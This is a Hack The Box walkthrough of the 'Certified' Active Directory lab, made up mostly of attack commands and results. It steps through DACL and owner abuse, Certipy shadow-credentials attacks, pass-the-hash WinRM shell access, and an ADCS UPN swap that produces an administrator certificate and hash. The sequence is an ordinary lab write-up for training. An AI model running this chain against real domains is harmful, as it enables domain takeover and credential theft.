Certified

Certified HTB Walkthrough

Initial Nmap Scan

nmap -p- -sVC 10.129.231.186

Notable Ports and Services:

53 (DNS)
88 (Kerberos)
389/636/3268/3269 (LDAP)
135, 139, 445 (SMB, NetBIOS)
5985 (WinRM)
9389 (.NET Message Framing)
Various high RPC ports

SMB Authentication Attempt

nxc smb certified.htb -u judith.mader -p judith09

Result:

Successful login: certified.htb\judith.mader

Enumerating Shares (First Attempt Fails)

nxc smb DC01.certified.htb --shares

Result:

STATUS_USER_SESSION_DELETED

nxc winrm certified.htb -u judith.mader -p judith09

Result:

Enumerating Shares (Successful)

nxc smb DC01.certified.htb -u judith.mader -p judith09 --shares

Result:

ADMIN$
C$
IPC$
NETLOGON
SYSVOL

BloodHound

Owner SID Modification

owneredit.py -action write -new-owner judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.129.231.186

Result:

OwnerSid of Domain Admins modified successfully

DACL Permission Injection

dacledit.py -action 'write' -rights 'WriteMembers' -principal judith.mader -target management "certified.htb"/"judith.mader":"judith09"

Result:

DACL modified successfully

Add User to Group

net rpc group addmem management judith.mader -U "certified.htb"/"judith.mader"%"judith09" -S 10.129.231.186

Result:

Successfully added

Shadow Credentials Attack with Certipy (1st Attempt Fail)

certipy shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc -target certified.htb -dc-ip 10.129.231.186

Result:

Clock skew error

Shadow Credentials Attack with Correct Time Sync

sudo ntpdate 10.129.166.118
certipy shadow auto -target certified.htb -dc-ip 10.129.68.9 -username judith.mader@certified.htb -password judith09 -account management_svc

Result:

NT hash for management_svc retrieved: a091c1832bcdd4677c28b5a6a1295584

Confirm Access with NT Hash

nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

Enumerate Shares and Users

nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 --shares
nxc smb certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 --users

Confirm WinRM Access

nxc winrm certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

Evil-WinRM Shell Access

evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

Identify ADCS Server

nxc ldap certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 -M adcs

Shadow Credentials on ca_operator

certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -target certified.htb -dc-ip 10.129.166.118

Result:

NT hash retrieved: b4b86f45c6018f1b664f70805f45d8f2

Modify UPN to Administrator

certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator

Request Certificate with Administrator UPN

certipy req -username ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -debug

Result:

Certificate issued with UPN: administrator
Saved as administrator.pfx

Authenticate as Administrator with Certificate

certipy auth -pfx administrator.pfx -domain certified.htb

Result:

NT hash retrieved: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

PreviousMedium NextPuppy

Last updated 10 months ago

hashtagCertified HTB Walkthrough

hashtagInitial Nmap Scan

hashtagSMB Authentication Attempt

hashtagEnumerating Shares (First Attempt Fails)

hashtagWinRM Login Attempt

hashtagEnumerating Shares (Successful)

hashtagBloodHound

hashtagOwner SID Modification

hashtagDACL Permission Injection

hashtagAdd User to Group

hashtagShadow Credentials Attack with Certipy (1st Attempt Fail)

hashtagShadow Credentials Attack with Correct Time Sync

hashtagConfirm Access with NT Hash

hashtagEnumerate Shares and Users

hashtagConfirm WinRM Access

hashtagEvil-WinRM Shell Access

hashtagIdentify ADCS Server

hashtagShadow Credentials on ca_operator

hashtagModify UPN to Administrator

hashtagRequest Certificate with Administrator UPN

hashtagAuthenticate as Administrator with Certificate

Certified HTB Walkthrough

Initial Nmap Scan

SMB Authentication Attempt

Enumerating Shares (First Attempt Fails)

WinRM Login Attempt

Enumerating Shares (Successful)

BloodHound

Owner SID Modification

DACL Permission Injection

Add User to Group

Shadow Credentials Attack with Certipy (1st Attempt Fail)

Shadow Credentials Attack with Correct Time Sync

Confirm Access with NT Hash

Enumerate Shares and Users

Confirm WinRM Access

Evil-WinRM Shell Access

Identify ADCS Server

Shadow Credentials on ca_operator

Modify UPN to Administrator

Request Certificate with Administrator UPN

Authenticate as Administrator with Certificate